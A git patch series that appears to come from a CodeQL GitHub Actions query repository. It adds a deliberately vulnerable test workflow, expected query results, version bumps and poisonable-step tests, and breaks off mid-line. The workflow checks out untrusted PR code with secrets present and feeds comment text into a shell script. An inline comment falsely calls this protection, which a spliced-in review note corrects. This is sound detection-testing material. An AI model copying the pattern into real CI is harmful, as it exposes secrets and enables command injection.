--- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml
@@ -0,0 +1,58 @@
+name: Benchmark
+
+on:
+ issue_comment:
+ types: [created]
+
+env:
+ TURBO_TOKEN: ${{ secrets.TURBO_TOKEN }}
+ TURBO_TEAM: ${{ secrets.TURBO_TEAM }}
+ FORCE_COLOR: true
+
+jobs:
+ benchmark:
+ if: ${{ github.repository_owner == 'foo' && github.event.issue.pull_request && startsWith(github.event.comment.body, '!bench') }}
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ persist-credentials: false
+ ref: refs/pull/${{ github.event.issue.number }}/head
+
+ - name: Setup PNPM
+ uses: pnpm/action-setup@v3
+
+ - name: Setup Node
+ uses: actions/setup-node@v4
+ with:
+ node-version: 18
+ cache: "pnpm"
+
+ - name: Install dependencies
+ run: pnpm install
+
+ - name: Build Packages
+ run: pnpm run build
+
+ - name: Get bench command
+ id: bench-command
+ env:
+ # protects from untrusted user input and command injection
+ COMMENT: ${{ github.event.comment.body }}
+ run: |
+ benchcmd=$(echo "$COMMENT" | grep '!bench' | awk -F ' ' '{print $2}')
+ echo "bench=$benchcmd" >> $GITHUB_OUTPUT
+ shell: bash
+
+ - name: Run benchmark
+ id: benchmark-pr
+ run: |
+ result=$(pnpm run --silent benchmark ${{ steps.bench-command.outputs.bench }})
+ processed=$(node ./benchmark/ci-helper.js "$result")
+ echo "BENCH_RESULT<> $GITHUB_OUTPUT
+ echo "### PR Benchmark" >> $GITHUB_OUTPUT
+ echo "$processed" >> $GITHUB_OUTPUT
+ echo "BENCHEOF" >> $GITHUB_OUTPUT
+ shell: bash
diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
index d95cf6fef09..124a26b1d47 100644
--- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
+++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
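Review bot: The inline comment in the "Get bench command" step of test7.yml, `# protects from untrusted user input and command injection`, overstates what the fixture does. `COMMENT` is passed through `env`, but the value derived from it is written to `$GITHUB_OUTPUT` and then expanded as `${{ steps.bench-command.outputs.bench }}` directly inside the `run:` script of "Run benchmark", so comment-controlled text still reaches the shell. The file also checks out `refs/pull/<n>/head` on `issue_comment` and then runs `pnpm install` and `pnpm run build` with the workflow-level `TURBO_TOKEN`/`TURBO_TEAM` secrets in the environment, which is presumably the pattern the CWE-829 queries are meant to flag. Since this reads as an intentionally vulnerable fixture, I would add a header comment such as `# Test fixture: intentionally vulnerable (PR-head checkout on issue_comment followed by build steps); do not copy`. I would also reword the inline comment to `# env indirection only covers this step; the output is re-expanded unquoted in "Run benchmark"` so that a reader does not take the file as a hardening example.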
@@ -16,4 +16,5 @@ | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref '1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref '3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 78e2afa2747..f2d229e80bb 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -304,6 +304,27 @@ edges | .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:39:9:43:6 | Run Step | | .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | | .github/workflows/test6.yml:39:9:43:6 | Run Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:24:9:27:6 | Uses Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 
| Run Step: benchmark-pr | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -335,5 +356,8 @@ edges | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | From 56b70981ae823bbe19fd50e6cd9985d6b9f6e21f Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Jul 2024 18:18:04 +0200 Subject: [PATCH 0379/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 59ab88b42e4..dd99208f5e3 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.13 +version: 0.1.14 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f25fd70619f..fe02dad9c55 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.13 +version: 0.1.14 groups: [actions, queries] suites: codeql-suites extractor: javascript From bc483fc380e5303a8939f695d885ec6d50ddd1ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 6 Jul 2024 22:44:57 +0200 Subject: [PATCH 0380/1267] Add poisonable step test --- .../.github/workflows/poisonable_steps.yml | 3 +- .../library-tests/poisonable_steps.expected | 3 +- ql/test/library-tests/test.expected | 161 ++++++++++-------- 3 files changed, 90 insertions(+), 77 deletions(-) diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 3e31507cef1..608b3d5a09f 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -21,5 +21,4 @@ jobs: - run: python scripts/generate_theme.py --outfile js/storybook/theme.css - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - - + - run: xvfb-run ./mvnw clean package 
diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 62ffff3c15c..52f38506f09 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -15,4 +15,5 @@ | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index efb0bca6952..19eda82df48 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -61,7 +61,8 @@ steps | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | 
@@ -106,7 +107,8 @@ runSteps | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | 
@@ -184,7 +186,8 @@ runStepChildren | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | 
@@ -337,82 +340,86 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| 
.github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | 
.github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| 
.github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| 